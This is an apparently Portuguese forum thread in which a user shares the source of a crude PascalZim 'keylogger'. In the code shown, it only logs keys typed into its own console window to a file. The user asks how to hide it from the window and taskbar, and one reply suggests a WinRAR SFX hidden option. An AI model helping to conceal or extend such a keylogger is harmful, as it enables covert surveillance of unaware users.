Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Duvida PascalZim

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Duvida Duvida PascalZim

    olá pessoal! novo no forum aqui !
    seguinte: criei um keylogger (gambiarra) no PascalZim mas não sei se existe um código para ocultar a janela dele e para que ele rode mesmo estando em 2º plano digo, se a janela não estiver ativa. existe um código para ocultar o programa no PacalZim? desde jah agradeço!
    Similar Threads

  • Font Size
    #2
    Cara você poderia usar o Winrar
    com as opções SFX tem a opção de deixar
    seu programa oculto !

    Comment


    • Font Size
      #3
      Procure o nosso Diretor, ele poderá te ajudar!


      Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
      "Sou a única certeza que vocês terão em toda a VIDA de vocês, eu tardo mais não falho !!! Tenho a certeza que algum dia irei visitar todos vocês"



      Comment


      • Font Size
        #4
        Postado Originalmente por podolcee Ver Post
        Cara você poderia usar o Winrar
        com as opções SFX tem a opção de deixar
        seu programa oculto !

        Acho que voce não intendeu amigo... eu quero que o programa seja oculto quanto a esta janela:



        Quero que ele rode no windows de modo que ele não seja visto na barra de tarefas do windows nem em nenhuma janela. se alguem puder disponibilizar um código para isto fico agradecido. obrigado

        Comment


        • Font Size
          #5
          posta a source ai pra gente
          ________________

          Comment


          • Font Size
            #6
            concerteza o mestre Lord Beni ajudará como disse o G1m
            abraço...
            A colher não existe.

            Comment


            • Font Size
              #7
              Pessoal ai esta o código fonte da "gambiarra". e como eu disse antes eh uma gambiarra mesmo e alem de tudo o keylogger não pega todas as teclas tipo F1, F2... Control, Shift mas em relação a letras ele captura bem.
              eh um codigo simples que apenas salva um arquivo de texto com as teclas capturadas.

              Program keyloggerByMynato ;
              var
              key : string;
              reg : text;

              Begin
              assign (reg, '\REGISTRO.log' ); //Cria um arquivo de log.
              rewrite (reg); //Abre o arquivo de log criado
              append (reg);
              writeln (reg, '================================================= ============='); writeln(reg); //Adiciona este texto ao arquivo de log
              writeln (reg, '============== Registro de teclas por keylogger =============='); writeln(reg);
              writeln (reg, '================================================= ============='); writeln(reg);
              close (reg); //Fecha o arquivo de log e salva-o em seguida
              Repeat
              Begin //Inicio do programa que captura as teclas
              if (keypressed) then readkey; //Verifica se uma tecla foi pressionada e a lê
              key := readkey; //Adiciona o valor da tecla pressionada à variavel "key"
              if (key = #9) then key := ('[TAB]'); //Se a tecla pressionada for igual a "TAB" escreve [TAB]
              if (key = #8) then key := ('[BKSP]'); //Se a tecla pressionada for igual a "BACKSPACE" escreve [BKSP]
              if (key = #13) then key := ('[ENTER]'); //Se a tecla pressionada for igual a "ENTER" escreve [ENTER]
              if (key = #27) then key := ('[ESC]'); //Se a tecla pressionada for igual a "ESC" escreve [ESC]
              if (key = ' ') then key := ('[SPACE]'); //Se a tecla pressionada for igual a "SPACE" escreve [SPACE]
              if (key = 'ç') then key := ('[c,]'); //Se a tecla pressionada for igual a "Ç" escreve [c,]
              append (reg); //Abre o arquivo de log criado anteriormente
              write (reg, key); //Adiciona a tecla pressionada ao arquivo de log
              close (reg); //Fecha o arquivo e o salva em seguida
              End;
              Until (key = '&'); //Verifica se a tecla pressionada é igual a "&" se se for encerra o programa e se não for continua gravando as teclas
              append (reg); //Daqui para baixo ele apenas adiciona mais texto ao final do arquivo.
              writeln (reg);
              writeln (reg);
              writeln (reg, '================================================= ============='); writeln (reg);
              writeln (reg, '======================= Fim do Registro. ====================='); writeln (reg);
              writeln (reg, '================================================= ============='); writeln (reg);
              close (reg);
              End.

              ele é compilável apenas no Pascalzim, e como eu disse eh uma tremenda gambiarra.
              para fechar o programa digite "&".
              se alguem tiver um código para ocultar a janela do programa e puder postar aqui fico agradecido.
              Créditos aos seus devidos autores ;P

              Comment

              X
              Working...
              X